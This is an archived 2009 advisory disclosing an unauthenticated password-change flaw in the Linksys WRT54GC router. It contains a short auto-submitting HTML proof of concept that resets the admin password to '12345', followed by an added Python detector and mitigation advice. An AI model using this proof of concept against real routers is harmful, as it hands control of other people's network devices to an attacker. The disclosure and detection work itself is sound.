Computer Security



Related information

  Linksys WRT54GC wireless routers unauthorized password change

From: gabriel_(at)_falandodeseguranca.com <gabriel_(at)_falandodeseguranca.com>
Date: 20.04.2009
Subject: Linksys WRT54GC - Admin Password Change (POC)

<!--
***************
* Gabriel Lima - gabriel@falandodeseguranca.com
* www.falandodeseguranca.com
***************

(English:)
       Linksys WRT54GC - Administration Password Change
The Router WRT54GC doesn't seem to check authentication from the administrator in its .CGI files, accepting any POST
request as a password change. Below follows an example of a form that changes the password and administrator login to
'12345'.
Tested on model Linksys WRT54GC - Firmware Version: v1.05.7 - Local and Remote administration


(Portuguese:)
       Linksys WRT54GC - Password Change
The WRT54GC router appears not to verify the administrator's authentication in its .CGI files, accepting any POST
submission as a password change. Below, an example of a form that changes the administrator password and login to
12345.
Tested on model Linksys WRT54GC - Firmware Version: v1.05.7 - Local and remote administration.


Credits:
Gabriel Lima. gabriel@falandodeseguranca.com
-->

<html><body>
<form method="POST" action="http://IP_ADDRESS:8080/administration.cgi" name="senha" ENCTYPE="multipart/form-data">
<INPUT type="hidden" name="sysPasswd" value="12345" maxLength=20 size=21>
<INPUT type="hidden" name="sysConfirmPasswd" value="12345" maxLength=20 size=21>
</form>

<!-- Form auto-submit code -->

<SCRIPT language="JavaScript">
 document.senha.submit();
</SCRIPT>

</body></html>
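
A defender-side check for the request shape described in the advisory, as an added example that is not part of the original post: it classifies a captured HTTP request (from a proxy log or packet capture) and reports whether it is a password-change POST to `administration.cgi`, whether it carries no credentials, and whether it was submitted from another site. The sample requests, the 192.0.2.1 address, and the assumption that an authenticated admin request carries an `Authorization` header are constructed for illustration.

```python
from urllib.parse import urlsplit

TARGET_PATH = "/administration.cgi"           # path taken from the advisory's form
FIELDS = (b"sysPasswd", b"sysConfirmPasswd")  # field names taken from the advisory's form

SAMPLE_POC = (  # constructed: shaped like the advisory's auto-submitted form
    b"POST /administration.cgi HTTP/1.1\r\nHost: 192.0.2.1:8080\r\n"
    b"Origin: http://example.test\r\n"
    b"Content-Type: multipart/form-data; boundary=x\r\n\r\n"
    b'--x\r\nContent-Disposition: form-data; name="sysPasswd"\r\n\r\n12345\r\n--x--\r\n'
)
SAMPLE_ADMIN = (  # constructed: admin using the router's own page (assumed header auth)
    b"POST /administration.cgi HTTP/1.1\r\nHost: 192.0.2.1:8080\r\n"
    b"Origin: http://192.0.2.1:8080\r\nAuthorization: Basic PLACEHOLDER\r\n"
    b"Content-Type: multipart/form-data; boundary=x\r\n\r\n"
    b'--x\r\nContent-Disposition: form-data; name="sysPasswd"\r\n\r\nnew-secret\r\n--x--\r\n'
)


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into method, path, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)  # ValueError if malformed
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method.upper(), urlsplit(target).path, headers, body


def classify(raw: bytes):
    """Return a list of findings; an empty list means the request is not of interest."""
    try:
        method, path, headers, body = parse_request(raw)
    except ValueError:
        return []
    is_target = method == "POST" and path.lower().endswith(TARGET_PATH)
    if not is_target or not any(field in body for field in FIELDS):
        return []
    findings = ["password-change POST to administration.cgi"]
    if "authorization" not in headers:
        findings.append("no Authorization header")
    # A form auto-submitted from another page carries that page's Origin/Referer.
    source = headers.get("origin") or headers.get("referer", "")
    src_host = urlsplit(source).netloc
    if src_host and src_host != headers.get("host", ""):
        findings.append(f"cross-site source: {src_host}")
    return findings
```

On the device side, the corresponding mitigations are the same two checks enforced before the password fields are processed: reject the POST unless it is authenticated, and reject it when it originates from a different site.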
